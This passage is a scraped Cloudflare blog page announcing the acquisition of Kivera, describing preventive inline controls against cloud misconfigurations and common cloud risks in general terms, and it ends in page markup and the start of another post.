1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In a significant leap forward in cloud security, the combination of Kivera’s technology and Cloudflare One adds preventive, inline controls to enforce secure configurations for cloud resources. By inspecting cloud API traffic, these new capabilities equip organizations with enhanced visibility and granular controls, allowing for a proactive approach in mitigating risks, managing cloud security posture, and embracing a streamlined DevOps process when deploying cloud infrastructure.</p><p>Kivera will add the following capabilities to Cloudflare’s <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\"><u>SASE</u></a> platform:</p><ul><li><p><b>One-click security:</b> Customers benefit from immediate prevention of the most common cloud breaches caused by misconfigurations, such as accidentally allowing public access or policy inconsistencies.</p></li><li><p><b>Enforced cloud tenant control:</b> Companies can easily draw boundaries around their cloud resources and tenants to ensure that sensitive data stays within their organization. </p></li><li><p><b>Prevent data exfiltration:</b> Easily set rules to prevent data being sent to unauthorized locations.</p></li><li><p><b>Reduce ‘shadow’ cloud infrastructure:</b> Ensure that every interaction between a customer and their cloud provider is in line with preset standards. </p></li><li><p><b>Streamline cloud security compliance:</b> Customers can automatically assess and enforce compliance against the most common regulatory frameworks.</p></li><li><p><b>Flexible DevOps model:</b> Enforce bespoke controls independent of public cloud setup and deployment tools, minimizing the layers of lock-in between an organization and a cloud provider.</p></li><li><p><b>Complementing other cloud security tools:</b> Create a first line of defense for cloud deployment errors, reducing the volume of alerts for customers also using CSPM tools or Cloud Native Application Protection Platforms (CNAPPs). </p></li></ul>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nALx5Qv8FBYxn1R6RkUvX/1b3dddb60d9d85142a9fda82d2eee381/BLOG-2592_2.png\" alt=\"BLOG-2592 2\" class=\"kg-image\" width=\"1999\" height=\"1155\" loading=\"lazy\"/>\n </figure><p><sub><i>An intelligent proxy that uses a policy-based approach to \nenforce secure configuration of cloud resources.</i></sub></p>\n <div class=\"flex anchor relative\">\n <h2 id=\"better-together-with-cloudflare-one\">Better together with Cloudflare One</h2>\n <a href=\"#better-together-with-cloudflare-one\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>As a SASE platform, Cloudflare One ensures safe access and provides data controls for cloud and SaaS apps. This integration broadens the scope of Cloudflare’s SASE platform beyond user-facing applications to incorporate increased cloud security through proactive configuration management of infrastructure services, beyond what CSPM and <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\"><u>CASB</u></a> solutions provide. With the addition of Kivera to Cloudflare One, customers now have a unified platform for all their inline protections, including cloud control, access management, and threat and data protection. All of these features are available with single-pass inspection, which is <a href=\"https://blog.cloudflare.com/network-performance-update-cio-edition/?_ga=2.241337794.1947644748.1710771073-1224524116.1709647459\"><u>50% faster</u></a> than <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\"><u>Secure Web Gateway (SWG)</u></a> alternatives. </p><p>With the earlier <a href=\"https://blog.cloudflare.com/cloudflare-acquires-bastionzero/\"><u>acquisition of BastionZero</u></a>, a Zero Trust infrastructure access company, Cloudflare One expanded the scope of its VPN replacement solution to cover infrastructure resources as easily as it does apps and networks. Together Kivera and BastionZero enable centralized security management across hybrid IT environments, and provide a modern DevOps-friendly way to help enterprises connect and protect their hybrid infrastructure with Zero Trust best practices.</p><p>Beyond its SASE capabilities, Cloudflare One is integral to <a href=\"https://www.cloudflare.com/connectivity-cloud/\"><u>Cloudflare’s connectivity cloud</u></a>, enabling organizations to consolidate IT security tools on a single platform. This simplifies secure access to resources, from developer privileged access to technical infrastructure and expanding cloud services. As <a href=\"https://www.cloudflare.com/lp/forrester-wave-sse-2024/\"><u>Forrester echoes</u></a>, “Cloudflare is a good choice for enterprise prospects seeking a high-performance, low-maintenance, DevOps-oriented solution.”</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"the-growing-threat-of-cloud-misconfigurations\">The growing threat of cloud misconfigurations</h2>\n <a href=\"#the-growing-threat-of-cloud-misconfigurations\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The cloud has become a prime target for cyberattacks. According to the <a href=\"https://www.crowdstrike.com/resources/reports/crowdstrike-2023-cloud-risk-report-executive-summary/\"><u>2023 Cloud Risk Report</u></a>, CrowdStrike observed a 95% increase in cloud exploitation from 2021 to 2022, with a staggering 288% jump in cases involving threat actors directly targeting the cloud.</p><p>Misconfigurations in cloud infrastructure settings, such as improperly set security parameters and default access controls, provide adversaries with an easy path to infiltrate the cloud. According to the <a href=\"https://cpl.thalesgroup.com/sites/default/files/content/cloud-security/2024/2024-thales-cloud-security-study-global-edition.pdf\"><u>2023 Thales Global Cloud Security Study</u></a>, which surveyed nearly 3,000 IT and security professionals from 18 countries, 44% of respondents reported experiencing a data breach, with misconfigurations and human error identified as the leading cause, accounting for 31% of the incidents.</p><p>Further, according to Gartner<sup>Ⓡ</sup>, “Through 2027, 99% of records compromised in cloud environments will be the result of user misconfigurations and account compromise, not the result of an issue with the cloud provider.”<sup>1</sup></p><p>Several factors contribute to the rise of cloud misconfigurations:</p><ul><li><p><b>Rapid adoption of cloud services:</b> Leaders are often driven by the scalability, cost-efficiency, and ability to support remote work and real-time collaboration that cloud services offer. These factors enable rapid adoption of cloud services which can lead to unintentional misconfigurations as IT teams struggle to keep up with the pace and complexity of these services. </p></li><li><p><b>Complexity of cloud environments:</b> Cloud infrastructure can be highly complex with multiple services and configurations to manage. For example, <a href=\"https://public.docs.kivera.io/docs/access-analyzer\"><u>AWS alone offers</u></a> 373 services with 15,617 actions and 140,000+ parameters, making it challenging for IT teams to manage settings accurately. </p></li><li><p><b>Decentralized management:</b> In large organizations, cloud infrastructure resources are often managed by multiple teams or departments. Without centralized oversight, inconsistent security policies and configurations can arise, increasing the risk of misconfigurations.</p></li><li><p><b>Continuous Integration and Continuous Deployment (CI/CD):</b> CI/CD pipelines promote the ability to rapidly deploy, change and frequently update infrastructure. With this velocity comes the increased risk of misconfigurations when changes are not properly managed and reviewed.</p></li><li><p><b>Insufficient training and awareness:</b> Employees may lack the cross-functional skills needed for cloud security, such as understanding networks, identity, and service configurations. This knowledge gap can lead to mistakes and increases the risk of misconfigurations that compromise security.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h3 id=\"common-exploitation-methods\">Common exploitation methods </h3>\n <a href=\"#common-exploitation-methods\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Threat actors exploit cloud services through various means, including targeting misconfigurations, abusing privileges, and bypassing encryption. Misconfigurations such as exposed storage buckets or improperly secured APIs offer attackers easy access to sensitive data and resources. Privilege abuse occurs when attackers gain unauthorized access through compromised credentials or poorly managed identity and access management (IAM) policies, allowing them to escalate their access and move laterally within the cloud environment. Additionally, unencrypted data enables attackers to intercept and decrypt data in transit or at rest, further compromising the integrity and confidentiality of sensitive information.</p><p>Here are some other vulnerabilities that organizations should address: </p><ul><li><p><b>Unrestricted access to cloud tenants:</b> Allowing unrestricted access exposes cloud platforms to <a href=\"https://www.cloudflare.com/learning/security/what-is-data-exfiltration/\">data exfiltration</a> by malicious actors. Limiting access to approved tenants with specific IP addresses and service destinations helps prevent unauthorized access.</p></li><li><p><b>Exposed access keys:</b> Exposed access keys can be exploited by unauthorized parties to steal or delete data. Requiring encryption for the access keys and restricting their usage can mitigate this risk.</p></li><li><p><b>Excessive account permissions:</b> Granting excessive privileges to cloud accounts increases the potential impact of security breaches. Limiting permissions to necessary operations helps prevent lateral movement and privilege escalation by threat actors.</p></li><li><p><b>Inadequate network segmentation:</b> Poorly managed network security groups and insufficient segmentation practices can allow attackers to move freely within cloud environments. Drawing boundaries around your cloud resources and tenants ensures that data stays within your organization.</p></li><li><p><b>Improper public access configuration:</b> Incorrectly exposing critical services or storage resources to the internet increases the likelihood of unauthorized access and data compromise. Preventing public access drastically reduces risk.</p></li><li><p><b>Shadow cloud infrastructure:</b> Abandoned or neglected cloud instances are often left vulnerable to exploitation, providing attackers with opportunities to access sensitive data left behind. Preventing untagged or unapproved cloud resources to be created can reduce the risk of exposure.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"limitations-of-existing-tools\">Limitations of existing tools </h2>\n <a href=\"#limitations-of-existing-tools\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Many organizations turn to CSPM tools to give them more visibility into cloud misconfigurations. These tools often alert teams after an issue occurs, putting security teams in a reactive mode. Remediation efforts require collaboration between security teams and developers to implement changes, which can be time-consuming and resource-intensive. This approach not only delays issue resolution but also exposes companies to compliance and legal risks, while failing to train employees on secure cloud practices. <a href=\"https://www.ibm.com/reports/data-breach-action-guide\"><u>On average</u></a>, it takes 207 days to identify these breaches and an additional 70 days to contain them. </p><p>Addressing the growing threat of cloud misconfigurations requires proactive security measures and continuous monitoring. Organizations must adopt proactive security solutions that not only detect and alert but also prevent misconfigurations from occuring in the first place and enforce best practices. Creating a first line of defense for cloud deployment errors reduces the volume of alerts for customers, especially those also using CSPM tools or CNAPPs. </p><p>By implementing these proactive strategies, organizations can safeguard their cloud environments against the evolving landscape of cyber threats, ensuring robust security and compliance while minimizing risks and operational disruptions.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next-for-kivera\">What’s next for Kivera</h2>\n <a href=\"#whats-next-for-kivera\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The Kivera product will not be a point solution add-on. We’re making it a core part of our Cloudflare One offering because integrating features from products like our Secure Web Gateway give customers a comprehensive solution that works better together.</p><p>We’re excited to welcome Kivera to the Cloudflare team. Through the end of 2024 and into early 2025, Kivera’s team will focus on integrating their preventive inline cloud app controls directly into Cloudflare One. We are looking for early access testers and teams to provide feedback about what they would like to see. If you’d like early access, please <a href=\"https://www.cloudflare.com/lp/cloud-app-controls\"><u>join the waitlist</u></a>.</p><p><sub>[1] Source: Outcome-Driven Metrics You Can Use to Evaluate Cloud Security Controls, Gartner, Charlie Winckless, Paul Proctor, Manuel Acosta, 09/28/2023 </sub></p><p><sub>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.</sub></p><p>\n</p>"],"published_at":[0,"2024-10-08T06:00-07:00"],"updated_at":[0,"2024-11-22T18:43:45.968Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/30RE4iMKhbDhGGXskFMplQ/d014591604196342f215cb093d7100b4/BLOG-2592_1.png"],"tags":[1,[[0,{"id":[0,"6l7hyMgGAf9GhOz3E7MNxh"],"name":[0,"Data Protection"],"slug":[0,"data-protection"]}],[0,{"id":[0,"013htAspXBEMdE76Afcyq2"],"name":[0,"Acquisitions"],"slug":[0,"acquisitions"]}],[0,{"id":[0,"2Kxh34kIQRA3gyymmhJpsR"],"name":[0,"Email Security"],"slug":[0,"email-security"]}],[0,{"id":[0,"73lXar1fZP6qrIIcgBA5Te"],"name":[0,"Cloud Email Security"],"slug":[0,"cloud-email-security"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"name":[0,"Security"],"slug":[0,"security"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Noelle Kagan"],"slug":[0,"noelle"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4mJ1POhjqxk4ugsdEWIzZ3/19785afce2122fdd522375f73ae77bfb/noelle.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Neil Brown"],"slug":[0,"neil-brown"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15RcwB6GdLCUih1FFhwmLD/505ee5bf2c94069e8d7c364474f5d42f/Screenshot_2024-10-07_at_3.02.06_PM.png"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}],[0,{"name":[0,"Yumna Moazzam"],"slug":[0,"yumna"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/r0Nl4nvnTaWMbkYq6OaqB/23d73ea7949bace057cef7e67808f1ac/Outlook-n0p4yq3n.png"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}]]],"meta_description":[0,"The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. "],"primary_author":[0,{}],"localeList":[0,{"name":[0,"blog-english-only"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/cloudflare-acquires-kivera"],"metadata":[0,{"title":[0,"Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One"],"description":[0,"The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. "],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2hr2uadS2ijoa710twE0e4/cecd5e9c68247511afa1bbf15e653962/BLOG-2592_OG.png"]}]}],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"PostCard","value":true}" await-children> <article class="w-50-l mt4 mt2-l mb4 ph3 bb b--gray8 bn-l"> <div class="w-100"> <a href="https://blog-cloudflare-com.translate.goog/cloudflare-acquires-kivera/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 no-underline gray1" data-testid="post-title"><h2 class="fw5 mt2">Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One</h2></a> <p class="f3 fw5 gray5 my" data-testid="post-date">2024-10-08</p> <div class=""> <a href="https://blog-cloudflare-com.translate.goog/tag/data-protection/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Data Protection</a><a href="https://blog-cloudflare-com.translate.goog/tag/acquisitions/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Acquisitions</a><a href="https://blog-cloudflare-com.translate.goog/tag/email-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Email Security</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloud-email-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloud Email Security</a><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">SASE</a><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Zero Trust</a><a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Security</a><a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Product News</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloudflare One</a> </div> <p class="f3 fw4 gray1 lh-copy " data-testid="post-content">The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. <!-- -->...</p> <ul class="author-lists flex pl0"> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/noelle/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4mJ1POhjqxk4ugsdEWIzZ3/19785afce2122fdd522375f73ae77bfb/noelle.png" alt="Noelle Kagan" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/noelle/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Noelle Kagan</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/neil-brown/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15RcwB6GdLCUih1FFhwmLD/505ee5bf2c94069e8d7c364474f5d42f/Screenshot_2024-10-07_at_3.02.06_PM.png" alt="Neil Brown" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/neil-brown/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Neil Brown</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/yumna/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/r0Nl4nvnTaWMbkYq6OaqB/23d73ea7949bace057cef7e67808f1ac/Outlook-n0p4yq3n.png" alt="Yumna Moazzam" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/yumna/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Yumna Moazzam</a> </div></li> </ul> </div> </article><!--astro:end--> </astro-island><astro-island uid="Z1FoJkR" prefix="r4" component-url="/_astro/PostCard.CG32ktie.js" component-export="PostCard" renderer-url="/_astro/client.DLO1yDVm.js" props="{"currentPage":[0,1],"isFeaturedImageFirstPost":[0,false],"post":[0,{"id":[0,"3hUMWCRTsPTuqyUixn3aXp"],"title":[0,"A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections"],"slug":[0,"a-safer-internet-with-cloudflare"],"excerpt":[0,"Today, we are taking some big steps forward in our mission to help build a better Internet. Cloudflare is giving everyone free access to 10+ different website and network security products and features."],"featured":[0,false],"html":[0,"<p>Anyone using the Internet likely touches Cloudflare’s network on a daily basis, either by accessing a site protected by Cloudflare, using our <a href=\"https://1.1.1.1/dns\"><u>1.1.1.1 resolver</u></a>, or connecting via a network using our Cloudflare One products.</p><p>This puts Cloudflare in a position of great responsibility to make the Internet safer for billions of users worldwide. Today we 